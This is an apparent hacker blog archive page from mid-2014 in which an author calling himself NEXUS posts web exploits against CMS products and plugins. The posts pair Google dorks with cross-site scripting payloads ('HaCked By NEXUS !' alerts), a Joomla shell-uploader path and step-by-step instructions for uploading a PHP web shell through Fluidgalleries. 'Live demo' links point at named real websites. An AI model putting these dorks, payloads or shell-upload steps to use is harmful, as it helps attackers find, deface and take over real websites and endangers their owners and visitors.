Affichage des articles dont le libellé est NEXUS. Afficher tous les articles
Affichage des articles dont le libellé est NEXUS. Afficher tous les articles

[XSS] noname-media

ProActive CMS - XSS

Joomla Collector Shell Uploader

Dork:
inurl:index.php?option=com_collector

Exploit:
 /index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

Live Demo:
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

 NEXUS - Sharing Is Caring

~ 0 commentaires

Joomla Aclassif - XSS

Pro-Service - XSS Vulnerability

MyBB Kingchat - XSS

Dork:
inurl:/kingchat.php?

Exploit:
 /kingchat.php?notic

Change that /... into this to see exploit:
 /kingchat.php?chat=2&l=2

Then add your scripts...

Live Demo:
http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

 NEXUS - Sharing Is Caring

~ 0 commentaires

Pej Studio & Nissi Infotech & Plante Graffix - Cross Site Scripting (XSS)

Seventeen Design XSS & SQLI


~ vendredi 4 juillet 2014 0 commentaires

Espacio Ecuador XSS & SQLI


~ 0 commentaires

WordPress zarzadzanie_kontem Plugin

Arwen Cross Site Scripting & SQL Injection

MD Webmarketing Cross Site Scripting / SQL Injection

milkshakedesign CMS - XSS Vulnerability

XSS Found By NEXUS !

I found all XSS in those sites :D
http://pastebin.com/fGSr5sn3
NEXUS 

~ 0 commentaires

mc-creation CMS - XSS Vulnerability

Morgane CMS - XSS Vulnerability

Joomla - com_joomla_flash_uploader Remote File Upload


~ mercredi 2 juillet 2014 0 commentaires

Kingcow CMS Cross Site Scripting

Dorks:
inurl:"search.php?for="
intext:"Powered by Central" 
* for parameter in search.php is VULNERABLE to XSS..

Exploits:
">&search_submit=Search
Or if you can't use normal script.. Change it from string to character: 
">&search_submit=Search
 These char "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" is "HaCked By NEXUS !" using Hack Bar of Firefox...



If you dont have that "Hack Bar" .. Download it from :
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Live Demo:
http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search
http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search
NEXUS 

~ mardi 1 juillet 2014 0 commentaires

Cm3 CMS Cross Site Scripting (XSS)

Dork:
intext:"Powered by cm3"
* Keywords & strSearchPhrase Parametrs In Search.asp Are Vulnerable to XSS..

Exploits:
http://www.NEXUS.com/forums/search.asp?strSearchPhrase=">&ContainerID=&forumsearchoption=topics
http://www.NEXUS,com/search.asp?keywords=">&SearchType=And&;CurrentPage=1
http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords">&;SearchType=Default 
http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords=">&x=0&y=0 
Live Demo:
http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&ContainerID=&forumsearchoption=topics 

NEXUS 

~ 0 commentaires

Fluidgalleries Photo Upload Remote - File Upload Vulnerability

Dorks:
inurl:"fluidgalleries/dat/info.dat"
 inurl:"/fluidgalleries/php/"
Exploit:
http://localhost/[path]/fluidgalleries/php/photo-upload.php
*Use Firefox...

Use Live HTTP Headers... Then go to here:
http://localhost/[path]/fluidgalleries/php/photo-upload.php

1.Click the Choose File button Then select a file [shell.php.jpg] 

2.Then click on the upload button.

3. Now using Live HTTP Headers uploaded files to PHP change [shell.php]

4. Then go to this page :
http://localhost/[path]/fluidgalleries/photos/ [Random number+shell.php]

Example: 1NEXUS.php

.. Video proof exploits :
http://m-h-a-c-k-e-r.persiangig.com/Black.Idc-Team/fluidgalleriesExploit/fluidgalleriesExploit.swf


~ lundi 30 juin 2014 0 commentaires